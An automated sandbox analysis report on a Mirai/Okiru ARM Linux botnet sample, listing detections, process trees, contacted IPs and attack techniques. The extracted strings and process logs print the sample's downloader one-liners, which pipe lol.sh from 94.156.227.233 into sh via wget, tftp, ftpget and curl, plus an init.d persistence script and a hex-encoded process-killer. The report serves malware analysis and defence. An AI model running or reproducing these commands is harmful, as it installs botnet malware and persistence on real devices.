Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
arm.nn.elf

Overview

General Information

Sample name:arm.nn.elf
Analysis ID:1566169
MD5:ac8341f87d520078a2e75c38201af17c
SHA1:04d1e235daf3b5fc4a74d446e071429fe5e4d666
SHA256:ad082aefa54bb46eb69c6df26ad692ea13c19865a0cf6714f141314ff7a14ac9
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai, Okiru
Score:88
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Drops files in suspicious directories
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1566169
Start date and time:2024-12-01 15:08:08 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 51s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm.nn.elf
Detection:MAL
Classification:mal88.spre.troj.evad.linELF@0/9@0/0
  • VT rate limit hit for: arm.nn.elf
Command:/tmp/arm.nn.elf
PID:6243
Exit Code:137
Exit Code Info:SIGKILL (9) Kill signal
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • dash New Fork (PID: 6219, Parent: 4332)
  • rm (PID: 6219, Parent: 4332, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.WEeXQ9bqMn /tmp/tmp.iUonm93Ec6 /tmp/tmp.5umU0YmnG2
  • dash New Fork (PID: 6220, Parent: 4332)
  • rm (PID: 6220, Parent: 4332, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.WEeXQ9bqMn /tmp/tmp.iUonm93Ec6 /tmp/tmp.5umU0YmnG2
  • arm.nn.elf (PID: 6243, Parent: 6147, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm.nn.elf
    • sh (PID: 6281, Parent: 6243, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"
      • sh New Fork (PID: 6292, Parent: 6281)
      • systemctl (PID: 6292, Parent: 6281, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service
    • sh (PID: 6318, Parent: 6243, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
      • sh New Fork (PID: 6320, Parent: 6318)
      • chmod (PID: 6320, Parent: 6318, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system
    • sh (PID: 6321, Parent: 6243, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
      • sh New Fork (PID: 6327, Parent: 6321)
      • ln (PID: 6327, Parent: 6321, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system
    • sh (PID: 6328, Parent: 6243, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn.elf'\n /tmp/arm.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm.nn.elf'\n killall arm.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm.nn.elf"
  • udisksd New Fork (PID: 6255, Parent: 799)
  • dumpe2fs (PID: 6255, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6294, Parent: 799)
  • dumpe2fs (PID: 6294, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • systemd New Fork (PID: 6306, Parent: 6305)
  • snapd-env-generator (PID: 6306, Parent: 6305, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • sh (PID: 6307, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
  • gsd-housekeeping (PID: 6307, Parent: 1477, MD5: b55f3394a84976ddb92a2915e5d76914) Arguments: /usr/libexec/gsd-housekeeping
  • udisksd New Fork (PID: 6342, Parent: 799)
  • dumpe2fs (PID: 6342, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6372, Parent: 799)
  • dumpe2fs (PID: 6372, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
arm.nn.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    arm.nn.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      6243.1.00007fde1c017000.00007fde1c032000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
        6243.1.00007fde1c017000.00007fde1c032000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6259.1.00007fde1c017000.00007fde1c032000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
            6259.1.00007fde1c017000.00007fde1c032000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              Process Memory Space: arm.nn.elf PID: 6243JoeSecurity_OkiruYara detected OkiruJoe Security
                Click to see the 1 entries
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: arm.nn.elfAvira: detected
                Source: arm.nn.elfReversingLabs: Detection: 47%
                Source: arm.nn.elfString: getinfo xxxTSource Engine Query(deleted)/proc/self/exe/proc/%s/exe/proc/opendirtmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/ /tmp/./fd/socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/login94.156.227.234malloc[start_pid_hopping] Failed to clone: %s
                Source: arm.nn.elfString: incorrectinvalidbadwrongfaildeniederrorretryenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh94.156.227.233GET /dlr. HTTP/1.0
                Source: global trafficTCP traffic: 192.168.2.23:38966 -> 154.216.19.139:199
                Source: /tmp/arm.nn.elf (PID: 6243)Socket: 0.0.0.0:38242Jump to behavior
                Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
                Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
                Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
                Source: arm.nn.elf, system.16.dr, inittab.16.dr, arm.nn.elf.42.dr, profile.16.dr, custom.service.16.dr, bootcmd.16.drString found in binary or memory: http://94.156.227.233/
                Source: arm.nn.elfString found in binary or memory: http://94.156.227.233/curl.sh
                Source: arm.nn.elfString found in binary or memory: http://94.156.227.233/lol.sh
                Source: arm.nn.elfString found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33606
                Source: unknownNetwork traffic detected: HTTP traffic on port 33606 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
                Source: Initial sampleString containing 'busybox' found: /bin/busybox
                Source: Initial sampleString containing 'busybox' found: getinfo xxxTSource Engine Query(deleted)/proc/self/exe/proc/%s/exe/proc/opendirtmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/ /tmp/./fd/socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin
                Source: Initial sampleString containing 'busybox' found: usage: busybox
                Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname PBOC
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
                Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;
                Source: Initial sampleString containing 'busybox' found: /bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;
                Source: Initial sampleString containing 'busybox' found: /bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;
                Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
                Source: Initial sampleString containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh94.156.227.233GET /dlr. HTTP/1.0
                Source: Initial sampleString containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4
                Source: ELF static info symbol of initial sample.symtab present: no
                Source: /tmp/arm.nn.elf (PID: 6259)SIGKILL sent: pid: 788, result: successfulJump to behavior
                Source: /tmp/arm.nn.elf (PID: 6259)SIGKILL sent: pid: 884, result: successfulJump to behavior
                Source: /tmp/arm.nn.elf (PID: 6259)SIGKILL sent: pid: 1664, result: successfulJump to behavior
                Source: /tmp/arm.nn.elf (PID: 6259)SIGKILL sent: pid: 2096, result: successfulJump to behavior
                Source: /tmp/arm.nn.elf (PID: 6259)SIGKILL sent: pid: 2102, result: successfulJump to behavior
                Source: /tmp/arm.nn.elf (PID: 6259)SIGKILL sent: pid: 6243, result: successfulJump to behavior
                Source: classification engineClassification label: mal88.spre.troj.evad.linELF@0/9@0/0

                Persistence and Installation Behavior

                barindex
                Source: /tmp/arm.nn.elf (PID: 6243)File: /etc/profileJump to behavior
                Source: /usr/bin/ln (PID: 6327)File: /etc/rcS.d/S99system -> /etc/init.d/systemJump to behavior
                Source: /usr/bin/chmod (PID: 6320)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /tmp/arm.nn.elf (PID: 6281)Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"Jump to behavior
                Source: /tmp/arm.nn.elf (PID: 6318)Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"Jump to behavior
                Source: /tmp/arm.nn.elf (PID: 6321)Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"Jump to behavior
                Source: /tmp/arm.nn.elf (PID: 6328)Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn.elf'\n /tmp/arm.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm.nn.elf'\n killall arm.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm.nn.elf"Jump to behavior
                Source: /bin/sh (PID: 6320)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/systemJump to behavior
                Source: /usr/bin/dash (PID: 6219)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.WEeXQ9bqMn /tmp/tmp.iUonm93Ec6 /tmp/tmp.5umU0YmnG2Jump to behavior
                Source: /usr/bin/dash (PID: 6220)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.WEeXQ9bqMn /tmp/tmp.iUonm93Ec6 /tmp/tmp.5umU0YmnG2Jump to behavior
                Source: /bin/sh (PID: 6292)Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.serviceJump to behavior
                Source: /usr/bin/chmod (PID: 6320)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /tmp/arm.nn.elf (PID: 6243)Writes shell script file to disk with an unusual file extension: /etc/init.d/systemJump to dropped file
                Source: /bin/sh (PID: 6328)Writes shell script file to disk with an unusual file extension: /etc/init.d/arm.nn.elfJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: /tmp/arm.nn.elf (PID: 6243)File: /etc/init.d/systemJump to dropped file
                Source: /bin/sh (PID: 6328)File: /etc/init.d/arm.nn.elfJump to dropped file
                Source: /tmp/arm.nn.elf (PID: 6243)Queries kernel information via 'uname': Jump to behavior
                Source: arm.nn.elf, 6259.1.0000556d02ab6000.0000556d02c05000.rw-.sdmpBinary or memory string: mU/arm/ro10 /proc/1890/exe0!/usr/bin/vmtoolsd1/usr/libexec/gvfs-mtp-volume-monitor!/proc/1888/exe0!/proc/759/exe!/proc/2078/exe/arm/pro!/proc/4447/exe/arm/proa
                Source: arm.nn.elf, 6259.1.00007fde1c03a000.00007fde1c03e000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd
                Source: arm.nn.elf, 6243.1.00007ffecc38d000.00007ffecc3ae000.rw-.sdmpBinary or memory string: :mU/tmp/qemu-open.2MVURe:UQmU
                Source: arm.nn.elf, 6243.1.0000556d02ab6000.0000556d02c05000.rw-.sdmp, arm.nn.elf, 6259.1.0000556d02ab6000.0000556d02c05000.rw-.sdmpBinary or memory string: /arm/usr/lib/systemd/systemd-udevdc/qemu-binfmt
                Source: arm.nn.elf, 6243.1.0000556d02ab6000.0000556d02c05000.rw-.sdmp, arm.nn.elf, 6259.1.0000556d02ab6000.0000556d02c05000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
                Source: arm.nn.elf, 6243.1.00007ffecc38d000.00007ffecc3ae000.rw-.sdmp, arm.nn.elf, 6259.1.00007ffecc38d000.00007ffecc3ae000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
                Source: arm.nn.elf, 6243.1.00007ffecc38d000.00007ffecc3ae000.rw-.sdmp, arm.nn.elf, 6259.1.00007ffecc38d000.00007ffecc3ae000.rw-.sdmpBinary or memory string: J x86_64/usr/bin/qemu-arm/tmp/arm.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm.nn.elf
                Source: arm.nn.elf, 6243.1.0000556d02ab6000.0000556d02c05000.rw-.sdmp, arm.nn.elf, 6259.1.0000556d02ab6000.0000556d02c05000.rw-.sdmpBinary or memory string: c/qemu-binfmt
                Source: arm.nn.elf, 6259.1.00007fde1c03a000.00007fde1c03e000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd8
                Source: arm.nn.elf, 6243.1.00007ffecc38d000.00007ffecc3ae000.rw-.sdmpBinary or memory string: /tmp/qemu-open.2MVURe
                Source: arm.nn.elf, 6243.1.0000556d02ab6000.0000556d02c05000.rw-.sdmp, arm.nn.elf, 6259.1.0000556d02ab6000.0000556d02c05000.rw-.sdmpBinary or memory string: mU!/etc/qemu-binfmt/arm

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: arm.nn.elf, type: SAMPLE
                Source: Yara matchFile source: 6243.1.00007fde1c017000.00007fde1c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6259.1.00007fde1c017000.00007fde1c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: arm.nn.elf, type: SAMPLE
                Source: Yara matchFile source: 6243.1.00007fde1c017000.00007fde1c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6259.1.00007fde1c017000.00007fde1c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: arm.nn.elf PID: 6243, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: arm.nn.elf PID: 6259, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: arm.nn.elf, type: SAMPLE
                Source: Yara matchFile source: 6243.1.00007fde1c017000.00007fde1c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6259.1.00007fde1c017000.00007fde1c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: arm.nn.elf, type: SAMPLE
                Source: Yara matchFile source: 6243.1.00007fde1c017000.00007fde1c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6259.1.00007fde1c017000.00007fde1c032000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: arm.nn.elf PID: 6243, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: arm.nn.elf PID: 6259, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information2
                Scripting
                Valid AccountsWindows Management Instrumentation1
                Unix Shell Configuration Modification
                1
                Unix Shell Configuration Modification
                1
                Masquerading
                OS Credential Dumping11
                Security Software Discovery
                Remote ServicesData from Local System1
                Encrypted Channel
                Exfiltration Over Other Network Medium1
                Data Manipulation
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Systemd Service
                1
                Systemd Service
                2
                File and Directory Permissions Modification
                LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
                Non-Standard Port
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt2
                Scripting
                Logon Script (Windows)1
                File Deletion
                Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                No configs have been found
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Number of created Files
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1566169 Sample: arm.nn.elf Startdate: 01/12/2024 Architecture: LINUX Score: 88 41 154.216.19.139, 199, 38966, 38968 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 2->41 43 109.202.202.202, 80 INIT7CH Switzerland 2->43 45 3 other IPs or domains 2->45 47 Antivirus / Scanner detection for submitted sample 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 Yara detected Okiru 2->51 53 Yara detected Mirai 2->53 8 dash rm arm.nn.elf 2->8         started        12 gnome-session-binary sh gsd-housekeeping 2->12         started        14 udisksd dumpe2fs 2->14         started        16 5 other processes 2->16 signatures3 process4 file5 37 /etc/profile, ASCII 8->37 dropped 39 /etc/init.d/system, POSIX 8->39 dropped 57 Sample tries to persist itself using /etc/profile 8->57 59 Drops files in suspicious directories 8->59 18 arm.nn.elf sh 8->18         started        20 arm.nn.elf sh 8->20         started        22 arm.nn.elf sh 8->22         started        26 2 other processes 8->26 signatures6 process7 file8 28 sh chmod 18->28         started        31 sh ln 20->31         started        35 /etc/init.d/arm.nn.elf, POSIX 22->35 dropped 55 Drops files in suspicious directories 22->55 33 sh systemctl 26->33         started        signatures9 process10 signatures11 61 Sample tries to set files in /etc globally writable 28->61 63 Sample tries to persist itself using System V runlevels 31->63
                SourceDetectionScannerLabelLink
                arm.nn.elf47%ReversingLabsLinux.Backdoor.Mirai
                arm.nn.elf100%AviraEXP/ELF.Mirai.W
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No contacted domains info
                NameSourceMaliciousAntivirus DetectionReputation
                http://94.156.227.233/curl.sharm.nn.elffalse
                  high
                  http://94.156.227.233/lol.sharm.nn.elffalse
                    high
                    http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sarm.nn.elffalse
                      high
                      http://94.156.227.233/arm.nn.elf, system.16.dr, inittab.16.dr, arm.nn.elf.42.dr, profile.16.dr, custom.service.16.dr, bootcmd.16.drfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        54.171.230.55
                        unknownUnited States
                        16509AMAZON-02USfalse
                        154.216.19.139
                        unknownSeychelles
                        135357SKHT-ASShenzhenKatherineHengTechnologyInformationCofalse
                        109.202.202.202
                        unknownSwitzerland
                        13030INIT7CHfalse
                        91.189.91.43
                        unknownUnited Kingdom
                        41231CANONICAL-ASGBfalse
                        91.189.91.42
                        unknownUnited Kingdom
                        41231CANONICAL-ASGBfalse
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        54.171.230.55snype.ppc.elfGet hashmaliciousGafgytBrowse
                          boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                            boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                              boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                spc.elfGet hashmaliciousUnknownBrowse
                                  sshd.elfGet hashmaliciousUnknownBrowse
                                    m68k.elfGet hashmaliciousUnknownBrowse
                                      ppc.elfGet hashmaliciousUnknownBrowse
                                        hmips.elfGet hashmaliciousUnknownBrowse
                                          arm5.elfGet hashmaliciousMiraiBrowse
                                            154.216.19.139m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                              m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
